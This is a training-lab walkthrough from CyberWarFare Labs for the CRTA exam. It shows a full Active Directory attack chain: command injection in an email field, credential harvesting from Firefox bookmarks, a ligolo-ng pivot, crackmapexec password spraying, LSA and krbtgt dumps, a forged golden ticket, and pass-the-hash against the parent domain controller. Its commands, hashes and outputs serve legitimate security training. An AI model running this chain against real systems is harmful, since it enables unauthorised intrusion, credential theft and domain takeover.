Scribd
Upload
48 views

CRTA Practise Lab Walkthrough - CRTA_Practise_Lab_Walkthrough

The document outlines a penetration testing process involving initial access through a VPN and scanning of IP ranges. It details steps taken to exploit vulnerabilities, including command execution via an email field, credential dumping, and lateral movement within the network using tools like crackmapexec and ligolo-ng. The final stages include extracting sensitive credentials and forging a golden ticket for further access to the Parent Domain Controller.

Uploaded by

sanket20147
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
48 views

CRTA Practise Lab Walkthrough - CRTA_Practise_Lab_Walkthrough

The document outlines a penetration testing process involving initial access through a VPN and scanning of IP ranges. It details steps taken to exploit vulnerabilities, including command execution via an email field, credential dumping, and lateral movement within the network using tools like crackmapexec and ligolo-ng. The final stages include extracting sensitive credentials and forging a golden ticket for further access to the Parent Domain Controller.

Uploaded by

sanket20147
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

Scope Access

VPN: 10.10.200.0/24

External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]

Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]

Initial Access

Scanning Available Host

Unset
nmap -sn 192.168.80.0/24

PS : If you cannot discover the IPs, the server have enabled temporary ping
blocking. You can specifically scan the following IPs.

We can see 1 hosts up; Let’s scan 192.168.80.10

Unset
nmap -sC -sV 192.168.80.10

© All Rights Reserved CyberWarFare Labs


We can see port 80 open, let’s visit the website:

There we can see signup link we can try signing up the new account if it
works or not

© All Rights Reserved CyberWarFare Labs


We signed up with the random user pass and if we login with user and
password we were able to login into the dashboard.

Then we intercepted some of the traffic from the website and one
interesting field that we found was newsletter email field.

© All Rights Reserved CyberWarFare Labs


We found command execution in email field:

Let’s try to dump critical files like passwd etc.

There we found the privilege user with credential:

© All Rights Reserved CyberWarFare Labs


Let's ssh in the machine with the discovered credentials in the
“/etc/passwd” file.

Unset
ssh [email protected]

Credential was correct, we got the initial access on the machine.

© All Rights Reserved CyberWarFare Labs


Enumeration
Enumerating the machine gives few leads to move forward.
We saw this machine has another adapter as well connected in different
networks.

Now let’s search for browser history / bookmarks, it has been found that
the machine has Mozilla Firefox installed.

Unset
ls -la .mozilla/
cd .mozilla/firefox/
# The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

We will use sqlite3 to access the firefox database as follows :

Unset
sqlite3 places.sqlite
.tables
select * from moz_bookmarks;

We found some interesting credentials in the mozilla bookmarks database.

© All Rights Reserved CyberWarFare Labs


Bookmark:

We have to perform pivoting as 192.168.98.0/24 is not directly accessible


from the VPN network. We will utilize ligolo-ng for the same.

Unset
#Attacker Machine, download proxy & agent :

#Proxy
wget
https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_pr
oxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget
https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_ag
ent_0.4.3_Linux_64bit.tar.gz

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim
machine.

Unset
# Attacker Machine

sudo ip tuntap add user <your_user> mode tun ligolo

© All Rights Reserved CyberWarFare Labs


Unset

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Confirm the route on your attacker machine. The internal IP range is now
added in the route.

Start the proxy on the attacker server

Unset
./proxy -selfcert -laddr 0.0.0.0:443

Transfer the agent on the victim machine & start the connection

Unset
#Replace this with your attacker IP address.

./agent -connect 10.10.200.X:443 -ignore-cert

On the server side, we can check that the agent connected successfully.

© All Rights Reserved CyberWarFare Labs


On the ligolo-ng proxy, check the session & start the tunnel.

Unset
session
list_tunnels
start

Now, fire up a new terminal & check that we can now access the internal IP

range 192.168.98.0/24

© All Rights Reserved CyberWarFare Labs


Initial Access
Let's scan first for the available host in the internal network
[192.168.98.0/24]. We can see three hosts are up with nmap:

Unset
nmap -sn 192.168.98.0/24

Let’s spray the discovered credentials in the network using crackmapexec


toolkit.

Unset
#Create a txt file with live hosts in the 192.168.98.0/24 network :

cat target.txt
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120

© All Rights Reserved CyberWarFare Labs


Unset
#Now, use cme to spray the credentials :

crackmapexec --verbose smb target.txt -u john -p User1@#$%6

Great! It seems that the user “John” is local administrator at “192.168.98.30”


machine, the name is “MGMT”

Now, let’s dump the LSA process using crackmapexec toolkit, it utilizes
impacket's module secretsdump for the same.

Unset
crackmapexec --verbose smb 192.168.98.30 -u john -p User1@#$%6 --lsa

Sweet!! Got the clear-text credentials of the user “corpmngr”

Again, let’s spray the credentials in the network using crackmapexec


toolkit

© All Rights Reserved CyberWarFare Labs


Unset
# Spray again in the network with the new credentials :

crackmapexec --verbose smb target.txt -u corpmngr -p 'User4&*&*'

Awesome, we got the credentials working as local administrator in the


“CDC” machine at “192.168.98.120”

Since we know the machine name & the domain, let’s update the same on
our hosts file.

Unset
sudo nano /etc/hosts

192.168.98.2 warfare.corp dc01.warfare.corp


192.168.98.120 child.warfare.corp cdc.child.warfare.corp

We are local administrator in the Child Domain Controller. Let's extract the
hash of “krbtgt” account using impacket secretsdump script. We will forge
a golden ticket to compromise the Parent Domain Controller.

Unset
secretsdump.py -debug child/corpmngr:'User4&*&*'@cdc.child.warfare.corp
-just-dc-user 'child\krbtgt'

#Results :

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900

krbtgt:aes256-cts-hmac-sha1-96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c1
0ab1031da11152611b2

© All Rights Reserved CyberWarFare Labs


We will perform SID Extraction using lookupsid python script.

Unset
lookupsid.py child/corpmngr:'User4&*&*'@child.warfare.corp

lookupsid.py child/corpmngr:'User4&*&*'@warfare.corp

So far we have got the following details :

© All Rights Reserved CyberWarFare Labs


Unset
#Result :

1. krbtgt aes256 Hash


ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2

2. Parent SID : S-1-5-21-3375883379-808943238-3239386119

3. Child SID : S-1-5-21-3754860944-83624914-1883974761

We will forge golden ticket using ticketer as follows :

Unset
ticketer.py -domain child.warfare.corp -aesKey
ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid
S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid
S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'

Let’s set the ccache file to the environment variable.

Unset
export KRB5CCNAME=corpmngr.ccache

© All Rights Reserved CyberWarFare Labs


Request Service Ticket using the ccache file.

Unset
getST.py -spn 'CIFS/dc01.warfare.corp' -k -no-pass
child.warfare.corp/corpmngr -debug

Unset
export KRB5CCNAME=corpmngr@[email protected]

Parent Domain Controller


We got the CIFS ticket of the Domain Controller as “corpmngr”, let’s extract
the Administrator password using secretsdump script.

Unset
secretsdump.py -k -no-pass dc01.warfare.corp -just-dc-user
'warfare\Administrator' -debug

© All Rights Reserved CyberWarFare Labs


Let’s access the Administrator credentials :

Unset
psexec.py -debug 'warfare/[email protected]' -hashes
aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60

If you like the practice lab, please give us a shoutout. Also, once you are
ready, feel free to drop an email to the support team
([email protected]) providing your availability in British
Summer Time (BST) in date & time format.

© All Rights Reserved CyberWarFare Labs

You might also like